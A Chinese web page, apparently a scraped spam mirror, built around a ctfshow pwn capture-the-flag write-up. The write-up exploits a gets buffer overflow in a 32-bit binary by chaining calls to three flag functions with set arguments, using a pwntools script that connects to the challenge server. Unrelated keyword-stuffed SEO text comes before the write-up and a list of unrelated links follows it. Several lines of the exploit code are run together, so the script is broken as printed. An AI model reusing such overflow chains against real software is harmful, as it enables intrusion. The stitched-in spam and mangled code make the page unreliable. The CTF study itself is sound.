当前位置: 首页 > news >正文

公司网站备案怎么弄烟台网站建设网站推广

公司网站备案怎么弄,烟台网站建设网站推广,官方网站建设公司排名,静态网站建设课程设计你是我的谁,我的我是你的谁 32 位程序,开启 NX 保护 看主函数 跟进 ctfshow 函数 gets 存在溢出 注意到有三个与 flag 相关的函数 先看 flag 函数 输出 flag 的条件: if ( flag1 && flag2 && a1 0xBDBDBDBD ) 看 flag_fu…

你是我的谁,我的我是你的谁

32 位程序,开启 NX 保护

看主函数

跟进 ctfshow 函数

gets 存在溢出

注意到有三个与 flag 相关的函数

先看 flag 函数

输出 flag 的条件:

 if ( flag1 && flag2 && a1 == 0xBDBDBDBD )

看 flag_func1 函数

会直接将 flag1 置 1

看 flag_func2 函数

flag2 置 1 的条件

  if ( flag1 && a1 == 0xACACACAC )

那么思路就很清晰了,溢出后先跳到 flag_func1,将 flag1 置 1

再跳到 flag_func2,满足条件让 flag2 置 1

最后跳到 flag 函数,满足条件读取打印 flag

写 exp:

# @author:My6n
# @time:20250614
from pwn import *
context(arch = 'i386',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28295)elf = ELF('./pwn')
flag_addr = elf.sym['flag']
flag1_addr = elf.sym['flag_func1']
flag2_addr = elf.sym['flag_func2']payload = cyclic(0x2c+4)
payload += p32(flag1_addr) 
payload += p32(flag2_addr) 
payload += p32(flag_addr)
payload += p32(0xACACACAC) + p32(0xBDBDBDBD)io.sendlineafter('Input your flag: ',payload)io.interactive()

没有问题

拿到 flag: ctfshow{e4a15f8b-48a0-46ce-9783-7fa48bef281a}

http://www.yayakq.cn/news/755953/

相关文章:

  • 陕西网站建设营销推广我找客户做网站怎么说
  • 网站建设极地网互联网企业信息服务平台
  • 北京便宜网站建设企业做网站的
  • 促销推广方式有哪些东城区网站排名seo
  • 南昌建设网站乐清网站制作哪家好
  • 微信官方网站怎么进入加强门户网站建设方案
  • 做计算机题目的网站阜阳室内设计学校
  • 平顶山建设银行网站郑州做网站元辰
  • 基于ASP与Access数据库的网站开发鼠标网站模板
  • 设计专业干货推荐网站黄冈市建设银行网站
  • 网站建设个人先进材料网站页面怎样做1920
  • 汉口网站建设公司企业网站建设策划案
  • 恒美广告公司织梦网站需要优化
  • 男女做污视频网站关于网的设计创意作品
  • 外贸网站建站网络营销渠道的组成要素包括
  • 做网站除了有服务器还需要什么问题莱芜都市网人才网
  • 邢台中北世纪城网站兼职惠州网络推广公司
  • 中山做app网站公司吗做网站需要报备什么
  • 知名网站建设推荐怎么做网络推广最有效
  • 石家庄企业建站哪家好大连网站建设 意动科技
  • 外贸网站建设 公司价格网站建设一站式
  • 重庆响应式网站制作wordpress菜单排序
  • 繁昌网站建设建立网站的主要方式
  • 永济做网站单价定制做网站费用
  • 网站利于搜索深圳电子厂
  • 校园二级网站建设评比自评如何获取网站备案号
  • 对网站进行优化免费网络密码
  • 苏州做商城网站视频医疗平台网站开发
  • 菏泽市建设职工培训中心网站做外贸是否需要有自己的网站
  • 万网网站备案建设网站用什么语言开发稳定